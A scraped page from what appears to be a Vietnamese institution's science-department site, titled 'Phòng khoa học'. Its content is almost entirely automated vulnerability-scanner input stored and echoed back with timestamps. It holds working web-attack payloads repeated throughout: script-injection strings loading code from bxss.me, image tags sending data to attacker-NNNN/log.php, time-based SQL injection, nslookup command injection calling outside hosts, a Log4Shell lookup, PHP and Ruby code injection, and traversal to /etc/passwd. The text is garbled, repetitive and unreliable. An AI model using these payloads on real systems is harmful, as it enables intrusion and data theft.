Phòng khoa học

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9456'>

1<isindex type=image src=1 onerror=n9h7(9642)>

1<svg �onload=n9h7(9124);>

1<ScRiPt >n9h7(9553)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9492></ScRiPt>

1<ScRiPt >n9h7(9015)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6E%39%68%37%28%39%30%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>n9h7(9842)</script>

1<WEH8FD>NUXZ6[!+!]</WEH8FD>

1<ScRiPt >n9h7(9973)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

acux2264%C0%BEz1%C0%BCz2a%90bcxuca2264

acu10618%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10618

19467741

'"()&%<acx><ScRiPt >n9h7(9054)</ScRiPt>

1 @@VjQkc

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

0RyjhI0w')) OR 490=(SELECT 490 FROM PG_SLEEP(15))--

69patjFF') OR 370=(SELECT 370 FROM PG_SLEEP(15))--

XiHlt01i' OR 903=(SELECT 903 FROM PG_SLEEP(15))--

-1)) OR 48=(SELECT 48 FROM PG_SLEEP(15))--

-5) OR 351=(SELECT 351 FROM PG_SLEEP(15))--

-5 OR 330=(SELECT 330 FROM PG_SLEEP(15))--

QBn4k5FJ')); waitfor delay '0:0:15' --

Vm6J5SbS'); waitfor delay '0:0:15' --

hOmiCzya'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+310-310-1=0+0+0+1 --

-1' OR 2+639-639-1=0+0+0+1 or 'X0gWGZSe'='

-1' OR 2+843-843-1=0+0+0+1 --

-1 OR 2+813-813-1=0+0+0+1

-1 OR 2+247-247-1=0+0+0+1 --

wIsVxSAM

1 '.print(md5(31337)).'

${@print(md5(31337))}\

${@print(md5(31337))}

";print(md5(31337));$a="

';print(md5(31337));$a='

1 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1 '"()

1'"()&%<acx><ScRiPt >n9h7(9355)</ScRiPt>

1 1<aEM6CSt<

1 1<img sRc='http://attacker-9021/log.php?

^(#$!@#$)(()))******

1<aZENX2g x=9763>

!(()&&!|||

)

1 1<ifRAme sRc=9813.com></IfRamE>

1 1<W4QHEV>4YOTW[!+!]</W4QHEV>

1 1PRVSi <ScRiPt >dCDc(9702)</ScRiPt>

1 1}body{acu:Expre/**/SSion(dCDc(9899))}

1 bxss.me

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

<a HrEF=jaVaScRiPT:>

1some_inexistent_file_with_long_name%00.jpg

1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

<a HrEF=http://xss.bxss.me></a>

1 1<input autofocus onfocus=dCDc(9749)>

1 �<img acu onmouseover=dCDc(97591) //�>

1 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 ".gethostbyname(lc("hitja"."fibhnjji50ad1.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(77).chr(104).chr(80)."

1<ScRiPt>dCDc(9595)</sCripT>

"+response.write(9164340*9885234)+"

'+response.write(9164340*9885234)+'

response.write(9164340*9885234)

1\u003CScRiPt\dCDc(9514)\u003C/sCripT\u003E

1 %31%3C%53%63%52%69%50%74%20%3E%64%43%44%63%289444%29%3C%2F%73%43%72%69%70%54%3E

bxss.me/t/xss.html?%00

1<img/src=">" onerror=alert(9887)>

1 1<img src=xyz OnErRor=dCDc(9033)>

1<img src=//xss.bxss.me/t/dot.gif onload=dCDc(9081)>

../1

1 1<body onload=dCDc(9933)>

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

1 1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9802'>

1 1<isindex type=image src=1 onerror=dCDc(9420)>

1 1<svg �onload=dCDc(9659);>

1 1<ScRiPt >dCDc(9424)</ScRiPt>

1 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9483></ScRiPt>

1 1<ScRiPt >dCDc(9534)</ScRiPt>

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 1&n915980=v999129

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%64%43%44%63%28%39%36%37%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

HttP://bxss.me/t/xss.html?%00

1 1<script>dCDc(9439)</script>

1 1<W0ZEVU>JW0VN[!+!]</W0ZEVU>

1 1<esi:include src="http://bxss.me/rpb.png"/>

1 1<ScRiPt >dCDc(9902)</ScRiPt>

1 ${j${::-n}di:dns${::-:}//hitwzmiehjtbb8b605${::-.}bxss.me}

1 /xfs.bxss.me

1 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

1 ${9999564+10000285}

acx${98991*97996}::.x

1 acx[[${98991*97996}]]xca

1 @@F9Y2C

1 1��%2527%2522

1'"

;(nslookup hitywpwntyqnb7e854.bxss.me||perl -e "gethostbyname('hitywpwntyqnb7e854.bxss.me')")|(nslookup hitywpwntyqnb7e854.bxss.me||perl -e "gethostbyname('hitywpwntyqnb7e854.bxss.me')")&(nslookup hitywpwntyqnb7e854.bxss.me||perl -e "gethostbyname('hitywpwntyqnb7e854.bxss.me')")

`(nslookup hitcmkuxlgdppd3497.bxss.me||perl -e "gethostbyname('hitcmkuxlgdppd3497.bxss.me')")`

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

|(nslookup hitlygvhadtjcbf1eb.bxss.me||perl -e "gethostbyname('hitlygvhadtjcbf1eb.bxss.me')")

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

&(nslookup hitzrnfgvezgtd6ee9.bxss.me||perl -e "gethostbyname('hitzrnfgvezgtd6ee9.bxss.me')")&'\"`0&(nslookup hitzrnfgvezgtd6ee9.bxss.me||perl -e "gethostbyname('hitzrnfgvezgtd6ee9.bxss.me')")&`'

KOH9GCFy')) OR 572=(SELECT 572 FROM PG_SLEEP(15))--

$(nslookup hitzwsnxnvzged8981.bxss.me||perl -e "gethostbyname('hitzwsnxnvzged8981.bxss.me')")

lMECpIjJ') OR 602=(SELECT 602 FROM PG_SLEEP(15))--

(nslookup hitzhrkauyjdx3460a.bxss.me||perl -e "gethostbyname('hitzhrkauyjdx3460a.bxss.me')")

pdwbxYeY' OR 836=(SELECT 836 FROM PG_SLEEP(15))--

|echo pekiwq$()\ yplmua\nz^xyu||a #' |echo pekiwq$()\ yplmua\nz^xyu||a #|" |echo pekiwq$()\ yplmua\nz^xyu||a #

-1)) OR 772=(SELECT 772 FROM PG_SLEEP(15))--

&echo pcidiy$()\ mwxcsc\nz^xyu||a #' &echo pcidiy$()\ mwxcsc\nz^xyu||a #|" &echo pcidiy$()\ mwxcsc\nz^xyu||a #

-5) OR 159=(SELECT 159 FROM PG_SLEEP(15))--

echo nnxdbd$()\ msfecc\nz^xyu||a #' &echo nnxdbd$()\ msfecc\nz^xyu||a #|" &echo nnxdbd$()\ msfecc\nz^xyu||a #

-5 OR 284=(SELECT 284 FROM PG_SLEEP(15))--

1 qDd4sP2z')); waitfor delay '0:0:15' --

1 LbFEtM8Z'); waitfor delay '0:0:15' --

1 j9KU7HgG'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

1 -1)); waitfor delay '0:0:15' --

1 acx{{98991*97996}}xca

1 -1); waitfor delay '0:0:15' --

1 -1; waitfor delay '0:0:15' --

1 (select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

1 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1 if(now()=sysdate(),sleep(15),0)

1 -1" OR 2+126-126-1=0+0+0+1 --

1 -1' OR 2+99-99-1=0+0+0+1 or 'zLONGPdw'='

1 -1' OR 2+104-104-1=0+0+0+1 --

1 -1 OR 2+139-139-1=0+0+0+1

1 -1 OR 2+404-404-1=0+0+0+1 --

1 VpRixYTZ

1 '.gethostbyname(lc('hitzb'.'lgytafiv26006.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(88).chr(115).chr(79).'

1 '+'A'.concat(70-3).concat(22*4).concat(99).concat(83).concat(107).concat(66)+(require'socket' Socket.gethostbyname('hitpb'+'mwurzdna0a55d.bxss.me.')[3].to_s)+'

1B7Gdlb5ntO

<!--

1 '"

1 M008Loqb

1 /../../../../../../../../../../windows/system32/BITSADMIN.exe

1 "+"A".concat(70-3).concat(22*4).concat(97).concat(88).concat(121).concat(75)+(require"socket" Socket.gethostbyname("hitiw"+"tkvefuwx8a614.bxss.me.")[3].to_s)+"

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

1 acux8361%C0%BEz1%C0%BCz2a%90bcxuca8361

acu6000%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6000

"+response.write(9141240*9320452)+"

1 ^(#$!@#$)(()))******

1 !(()&&!|||

)

1 19095113

'+response.write(9141240*9320452)+'

response.write(9141240*9320452)

1 <!--

'"

1 ;(nslookup hitoqmgqqxkula4cf3.bxss.me||perl -e "gethostbyname('hitoqmgqqxkula4cf3.bxss.me')")|(nslookup hitoqmgqqxkula4cf3.bxss.me||perl -e "gethostbyname('hitoqmgqqxkula4cf3.bxss.me')")&(nslookup hitoqmgqqxkula4cf3.bxss.me||perl -e "gethostbyname('hitoqmgqqxkula4cf3.bxss.me')")

`(nslookup hittcmwyjterqe158f.bxss.me||perl -e "gethostbyname('hittcmwyjterqe158f.bxss.me')")`

1 |(nslookup hitryzcqetixqf7157.bxss.me||perl -e "gethostbyname('hitryzcqetixqf7157.bxss.me')")

'"()&%<acx><ScRiPt >dCDc(9297)</ScRiPt>

&(nslookup hitmyerxmslvc3ed6b.bxss.me||perl -e "gethostbyname('hitmyerxmslvc3ed6b.bxss.me')")&'\"`0&(nslookup hitmyerxmslvc3ed6b.bxss.me||perl -e "gethostbyname('hitmyerxmslvc3ed6b.bxss.me')")&`'

$(nslookup hittnuzuchzkn66908.bxss.me||perl -e "gethostbyname('hittnuzuchzkn66908.bxss.me')")

(nslookup hitvwycffxxmh7c0bb.bxss.me||perl -e "gethostbyname('hitvwycffxxmh7c0bb.bxss.me')")

|echo dxhblx$()\ bpsidy\nz^xyu||a #' |echo dxhblx$()\ bpsidy\nz^xyu||a #|" |echo dxhblx$()\ bpsidy\nz^xyu||a #

&echo crazmg$()\ pjidam\nz^xyu||a #' &echo crazmg$()\ pjidam\nz^xyu||a #|" &echo crazmg$()\ pjidam\nz^xyu||a #

echo yjriio$()\ rirevq\nz^xyu||a #' &echo yjriio$()\ rirevq\nz^xyu||a #|" &echo yjriio$()\ rirevq\nz^xyu||a #

1 1'"()&%<acx><ScRiPt >dCDc(9239)</ScRiPt>

'"()

1 1&n903318=v965130

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 '.print(md5(31337)).'

${@print(md5(31337))}\

${j${::-n}di:dns${::-:}//hitglulolrwhb519ae${::-.}bxss.me}

${@print(md5(31337))}

";print(md5(31337));$a="

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

bxss.me/t/xss.html?%00

1 HttP://bxss.me/t/xss.html?%00

1 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${9999577+9999210}

1 ../1

1 bxss.me

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1 1some_inexistent_file_with_long_name%00.jpg

".gethostbyname(lc("hitfm"."qkhcegnnfbd91.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(68).chr(103).chr(75)."

'.gethostbyname(lc('hitrg'.'gstdwafo15fbc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(71).chr(115).chr(66).'

1 ../../../../../../../../../../../../../../windows/win.ini

/../../../../../../../../../../windows/system32/BITSADMIN.exe

/xfs.bxss.me

1 '+'A'.concat(70-3).concat(22*4).concat(104).concat(76).concat(122).concat(86)+(require'socket' Socket.gethostbyname('hitxk'+'aywzedju668b8.bxss.me.')[3].to_s)+'

"+"A".concat(70-3).concat(22*4).concat(114).concat(68).concat(101).concat(81)+(require"socket" Socket.gethostbyname("hiths"+"pjfpcavx49b1c.bxss.me.")[3].to_s)+"

1 1<esi:include src="http://bxss.me/rpb.png"/>

1 ../../../../../../../../../../../../../../etc/passwd

1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

1 iyZs6hg3

1 @@nkLni

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

cLhhcwcz')) OR 119=(SELECT 119 FROM PG_SLEEP(15))--

RD5Ri3eb') OR 675=(SELECT 675 FROM PG_SLEEP(15))--

rh7efsLN' OR 663=(SELECT 663 FROM PG_SLEEP(15))--

-1)) OR 73=(SELECT 73 FROM PG_SLEEP(15))--

-5) OR 512=(SELECT 512 FROM PG_SLEEP(15))--

-5 OR 422=(SELECT 422 FROM PG_SLEEP(15))--

ZAcwKR9v')); waitfor delay '0:0:15' --

g8oGe1iG'); waitfor delay '0:0:15' --

bleDYNxH'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+143-143-1=0+0+0+1 --

-1' OR 2+612-612-1=0+0+0+1 or 'ddh3GP2Z'='

-1' OR 2+988-988-1=0+0+0+1 --

-1 OR 2+255-255-1=0+0+0+1

-1 OR 2+259-259-1=0+0+0+1 --

NytnysUO

1 1<a1LLXNt<

1 1<img sRc='http://attacker-9876/log.php?

1<adMTYLc x=9642>

1<ifRAme sRc=9098.com></IfRamE>

1<WRAH6O>QD1T4[!+!]</WRAH6O>

12GrkX <ScRiPt >Wq2L(9889)</ScRiPt>

1}body{acu:Expre/**/SSion(Wq2L(9804))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=Wq2L(9006)>

�<img acu onmouseover=Wq2L(96841) //�>

1<ScRiPt>Wq2L(9667)</sCripT>

1\u003CScRiPt\Wq2L(9943)\u003C/sCripT\u003E

1 %31%3C%53%63%52%69%50%74%20%3E%57%71%32%4C%289359%29%3C%2F%73%43%72%69%70%54%3E

1 1<img/src=">" onerror=alert(9770)>

1<img src=xyz OnErRor=Wq2L(9927)>

1 1<img src=//xss.bxss.me/t/dot.gif onload=Wq2L(9336)>

1<body onload=Wq2L(9500)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9129'>

1<isindex type=image src=1 onerror=Wq2L(9908)>

1<svg �onload=Wq2L(9006);>

1<ScRiPt >Wq2L(9480)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9833></ScRiPt>

1<ScRiPt >Wq2L(9925)</ScRiPt>

1 WfC8Epcd

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%57%71%32%4C%28%39%38%33%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1 1<esi:include src="http://bxss.me/rpb.png"/>

1<script>Wq2L(9264)</script>

1<WJWVBD>AIDT2[!+!]</WJWVBD>

1<ScRiPt >Wq2L(9666)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

1 ../1

1 ../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 acux8495%C0%BEz1%C0%BCz2a%90bcxuca8495

1 acu2609%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2609

bxss.me

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

;(nslookup hitzayktqjswxdfeed.bxss.me||perl -e "gethostbyname('hitzayktqjswxdfeed.bxss.me')")|(nslookup hitzayktqjswxdfeed.bxss.me||perl -e "gethostbyname('hitzayktqjswxdfeed.bxss.me')")&(nslookup hitzayktqjswxdfeed.bxss.me||perl -e "gethostbyname('hitzayktqjswxdfeed.bxss.me')")

`(nslookup hitbgdaidpjxu3b833.bxss.me||perl -e "gethostbyname('hitbgdaidpjxu3b833.bxss.me')")`

|(nslookup hitfhvomgvsuyb4391.bxss.me||perl -e "gethostbyname('hitfhvomgvsuyb4391.bxss.me')")

&(nslookup hitrvslruldlvba568.bxss.me||perl -e "gethostbyname('hitrvslruldlvba568.bxss.me')")&'\"`0&(nslookup hitrvslruldlvba568.bxss.me||perl -e "gethostbyname('hitrvslruldlvba568.bxss.me')")&`'

$(nslookup hitzkcnyncmji1206d.bxss.me||perl -e "gethostbyname('hitzkcnyncmji1206d.bxss.me')")

19926115

1 "+response.write(9530588*9379063)+"

'+response.write(9530588*9379063)+'

response.write(9530588*9379063)

1 '"()

/xfs.bxss.me

(nslookup hitciltzayzvl0a8cd.bxss.me||perl -e "gethostbyname('hitciltzayzvl0a8cd.bxss.me')")

|echo kjglwo$()\ iiqvwr\nz^xyu||a #' |echo kjglwo$()\ iiqvwr\nz^xyu||a #|" |echo kjglwo$()\ iiqvwr\nz^xyu||a #

'"()&%<acx><ScRiPt >Wq2L(9304)</ScRiPt>

&echo necwuf$()\ vudtka\nz^xyu||a #' &echo necwuf$()\ vudtka\nz^xyu||a #|" &echo necwuf$()\ vudtka\nz^xyu||a #

echo ameqae$()\ nnmkoy\nz^xyu||a #' &echo ameqae$()\ nnmkoy\nz^xyu||a #|" &echo ameqae$()\ nnmkoy\nz^xyu||a #

1 ^(#$!@#$)(()))******

<!--

'"

1 '.print(md5(31337)).'

1 1'"()&%<acx><ScRiPt >Wq2L(9454)</ScRiPt>

${@print(md5(31337))}\

${@print(md5(31337))}

";print(md5(31337));$a="

';print(md5(31337));$a='

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1 !(()&&!|||

1 )

1 bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

1 '+'A'.concat(70-3).concat(22*4).concat(113).concat(87).concat(104).concat(76)+(require'socket' Socket.gethostbyname('hitll'+'wjlubjzy10c89.bxss.me.')[3].to_s)+'

1 "+"A".concat(70-3).concat(22*4).concat(112).concat(69).concat(115).concat(69)+(require"socket" Socket.gethostbyname("hitzu"+"nqvxsger91e6a.bxss.me.")[3].to_s)+"

1 1CY6av0IGYO

${9999946+10000253}

1 ${j${::-n}di:dns${::-:}//hitqedkrfsort1c81e${::-.}bxss.me}

1 ".gethostbyname(lc("hitjs"."rtxdeeyo17b61.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(77).chr(113).chr(66)."

1 '.gethostbyname(lc('hitmz'.'ieqamzsk38d68.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(82).chr(119).chr(80).'

1 /../../../../../../../../../../windows/system32/BITSADMIN.exe

1 1&n999484=v996737

1

7/27/2024 5:09:38 AM 15

1

7/27/2024 5:09:38 AM 15

1

7/27/2024 5:09:37 AM 14

Xem thêm

1

7/27/2024 5:39:08 AM 14

1

7/27/2024 5:39:08 AM 14

1

7/27/2024 5:39:07 AM 14

1<ax2XUsT<

7/27/2024 5:39:06 AM 13

Xem thêm

1<aD4jofg<

7/27/2024 8:24:33 AM 3

1<img sRc='http://attacker-9432/log.php?

7/27/2024 8:24:31 AM 3

1<aiKL9xF x=9939>

7/27/2024 8:24:31 AM 4

Xem thêm

1<akfchi8<

7/27/2024 11:26:31 AM 2

1<img sRc='http://attacker-9385/log.php?

7/27/2024 11:26:31 AM 4

1<aDhiqKc x=9718>

7/27/2024 11:26:30 AM 3

Xem thêm

1<aMpAnP1< 0

1<img sRc='http://attacker-9499/log.php? 0

1<aLPNPZW x=9974> 0

1<ifRAme sRc=9124.com></IfRamE> 0

1<W1FEHU>ZQTZR[!+!]</W1FEHU> 0

15vdAB <ScRiPt >n9h7(9281)</ScRiPt> 0

1}body{acu:Expre/**/SSion(n9h7(9956))} 0

<a HrEF=jaVaScRiPT:> 0

<a HrEF=http://xss.bxss.me></a> 0

1<input autofocus onfocus=n9h7(9950)> 0

�<img acu onmouseover=n9h7(92671) //�> 0

1&lt;ScRiPt&gt;n9h7(9450)&lt;/sCripT&gt; 0

1\u003CScRiPt\n9h7(9441)\u003C/sCripT\u003E 0

%31%3C%53%63%52%69%50%74%20%3E%6E%39%68%37%289774%29%3C%2F%73%43%72%69%70%54%3E 0

1<img/src=">" onerror=alert(9635)> 0

1<img src=xyz OnErRor=n9h7(9185)> 0

1<img src=//xss.bxss.me/t/dot.gif onload=n9h7(9790)> 0

1<body onload=n9h7(9337)> 0

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9456'> 0

1<isindex type=image src=1 onerror=n9h7(9642)> 0

1<svg �onload=n9h7(9124);> 0

1<ScRiPt >n9h7(9553)</ScRiPt> 0

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9492></ScRiPt> 0

1<ScRiPt >n9h7(9015)</ScRiPt> 0

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6E%39%68%37%28%39%30%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0

1<script>n9h7(9842)</script> 0

1<WEH8FD>NUXZ6[!+!]</WEH8FD> 0

1<ScRiPt >n9h7(9973)</ScRiPt> 0

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0

acx__${98991*97996}__::.x 0

acx[[${98991*97996}]]xca 0

acx{{98991*97996}}xca 0

1 0

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0

1 0

<th:t="${acx}#foreach 0

1 0

<%={{={@{#{${acx}}%> 0

acux2264%C0%BEz1%C0%BCz2a%90bcxuca2264 0

acu10618%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10618 0

19467741 0

'"()&%<acx><ScRiPt >n9h7(9054)</ScRiPt> 0

1 0

1 0

@@VjQkc 0

1����%2527%2522 0

1'" 0

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0

0RyjhI0w')) OR 490=(SELECT 490 FROM PG_SLEEP(15))-- 0

69patjFF') OR 370=(SELECT 370 FROM PG_SLEEP(15))-- 0

XiHlt01i' OR 903=(SELECT 903 FROM PG_SLEEP(15))-- 0

-1)) OR 48=(SELECT 48 FROM PG_SLEEP(15))-- 0

-5) OR 351=(SELECT 351 FROM PG_SLEEP(15))-- 0

-5 OR 330=(SELECT 330 FROM PG_SLEEP(15))-- 0

QBn4k5FJ')); waitfor delay '0:0:15' -- 0

Vm6J5SbS'); waitfor delay '0:0:15' -- 0

hOmiCzya'; waitfor delay '0:0:15' -- 0

1 waitfor delay '0:0:15' -- 0

-1)); waitfor delay '0:0:15' -- 0

-1); waitfor delay '0:0:15' -- 0

-1; waitfor delay '0:0:15' -- 0

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0

if(now()=sysdate(),sleep(15),0) 0

-1" OR 2+310-310-1=0+0+0+1 -- 0

-1' OR 2+639-639-1=0+0+0+1 or 'X0gWGZSe'=' 0

-1' OR 2+843-843-1=0+0+0+1 -- 0

-1 OR 2+813-813-1=0+0+0+1 0

-1 OR 2+247-247-1=0+0+0+1 -- 0

wIsVxSAM 0

1 0

1 0

1 0

1 0

1 0

1 0

1 0

1 0

1<aMpAnP1<

1<img sRc='http://attacker-9499/log.php?

1<aLPNPZW x=9974>

1<ifRAme sRc=9124.com></IfRamE>

1<W1FEHU>ZQTZR[!+!]</W1FEHU>

15vdAB <ScRiPt >n9h7(9281)</ScRiPt>

1}body{acu:Expre/**/SSion(n9h7(9956))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=n9h7(9950)>

�<img acu onmouseover=n9h7(92671) //�>

1<ScRiPt>n9h7(9450)</sCripT>

1\u003CScRiPt\n9h7(9441)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%6E%39%68%37%289774%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9635)>

1<img src=xyz OnErRor=n9h7(9185)>

1<img src=//xss.bxss.me/t/dot.gif onload=n9h7(9790)>

1<body onload=n9h7(9337)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9456'>

1<isindex type=image src=1 onerror=n9h7(9642)>

1<svg �onload=n9h7(9124);>

1<ScRiPt >n9h7(9553)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9492></ScRiPt>

1<ScRiPt >n9h7(9015)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6E%39%68%37%28%39%30%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>n9h7(9842)</script>

1<WEH8FD>NUXZ6[!+!]</WEH8FD>

1<ScRiPt >n9h7(9973)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1

<th:t="${acx}#foreach

1

<%={{={@{#{${acx}}%>

acux2264%C0%BEz1%C0%BCz2a%90bcxuca2264

acu10618%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10618

19467741

'"()&%<acx><ScRiPt >n9h7(9054)</ScRiPt>

1

1

@@VjQkc

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

0RyjhI0w')) OR 490=(SELECT 490 FROM PG_SLEEP(15))--

69patjFF') OR 370=(SELECT 370 FROM PG_SLEEP(15))--

XiHlt01i' OR 903=(SELECT 903 FROM PG_SLEEP(15))--

-1)) OR 48=(SELECT 48 FROM PG_SLEEP(15))--

-5) OR 351=(SELECT 351 FROM PG_SLEEP(15))--

-5 OR 330=(SELECT 330 FROM PG_SLEEP(15))--

QBn4k5FJ')); waitfor delay '0:0:15' --

Vm6J5SbS'); waitfor delay '0:0:15' --

hOmiCzya'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+310-310-1=0+0+0+1 --

-1' OR 2+639-639-1=0+0+0+1 or 'X0gWGZSe'='

-1' OR 2+843-843-1=0+0+0+1 --

-1 OR 2+813-813-1=0+0+0+1

